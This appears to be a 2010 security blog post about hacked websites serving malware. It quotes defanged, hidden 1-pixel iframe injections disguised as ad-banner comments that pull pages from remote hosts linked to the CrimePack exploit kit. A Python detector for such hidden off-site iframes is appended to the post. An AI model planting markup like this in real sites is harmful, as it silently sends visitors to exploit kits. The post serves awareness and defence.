Thursday, October 7, 2010

Hacked Websites

It's probably no surprise that a major vector for malware entering the enterprise is hacked, so-called "legitimate" websites. There is no longer any such thing as a trusted website. I've seen so many innocuous websites serving malware, either because they were hacked or through malicious advertising. Nothing new really, if you've been following what's happening in the IT security world for the last couple of years.

Today, though, I saw a website that is apparently hacked, and instead of a subtle hidden iframe being inserted, there is this (intentionally munged):


[!--AD Revenue Banner: DO NOT REMOVE --]
[iframe name="yLeVaTapAV" src="hxxp://host30.freepicturebox.com/blog/cgi-bin/index.php" marginwidth="1" marginheight="0" title="YMeWErAbed" border="0" width="1" frameborder="0" height="0" scrolling="no"][/iframe]
[iframe name="ubYLuZYXun" src="hxxp://serv59.freepicturebox.com/logfile/index.php" marginwidth="1" marginheight="0" title="arepAhEZuN" border="0" width="1" frameborder="0" height="0" scrolling="no"][/iframe]
[!--AD Revenue Banner: DO NOT REMOVE --]


Maybe an attempt by the hacker to hide the malicious iframes "in plain sight"?

One of these sites serves up highly obfuscated JavaScript, and according to my logs it was serving up what looked like the CrimePack exploit kit.
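A check a site owner or proxy operator could run over served HTML to catch this pattern, as an added example that is not part of the original post: it flags iframes whose width or height attribute is 1 pixel or less and whose src points at a different host than the page. The threshold, the function names and the sample page (with placeholder hosts) are assumptions made for the example, and frames hidden by CSS rather than by attributes are out of scope.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

MAX_HIDDEN_PX = 1  # assumption: a frame this small in either dimension is invisible


def _px(value):
    """Parse a width/height attribute to int pixels; None if absent or not a number."""
    value = (value or "").strip().lower()
    value = value[:-2] if value.endswith("px") else value
    return int(value) if value.isdigit() else None


class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are effectively invisible and load from another host."""
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        width, height = _px(a.get("width")), _px(a.get("height"))
        tiny = any(d is not None and d <= MAX_HIDDEN_PX for d in (width, height))
        host = (urlparse(a.get("src") or "").hostname or "").lower()
        if tiny and host and host != self.page_host:  # hidden and off-site
            self.findings.append({"src_host": host, "width": width,
                                  "height": height, "line": self.getpos()[0]})


def find_hidden_iframes(html, page_host):
    finder = HiddenIframeFinder(page_host)
    finder.feed(html)
    return finder.findings


# Constructed sample: attribute pattern from the post, placeholder hosts.
SAMPLE = """<html><body>
<!--AD Revenue Banner: DO NOT REMOVE -->
<iframe src="http://host.example.net/blog/index.php" width="1" frameborder="0" height="0" scrolling="no"></iframe>
<!--AD Revenue Banner: DO NOT REMOVE -->
<iframe src="http://video.example.net/embed/1" width="560" height="315"></iframe>
<iframe src="/local/widget.html" width="0" height="0"></iframe>
</body></html>"""

if __name__ == "__main__":
    print(find_hidden_iframes(SAMPLE, "www.example.org"))
```

The visible video embed and the same-site zero-size frame are not reported; only the tiny off-site frame is.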
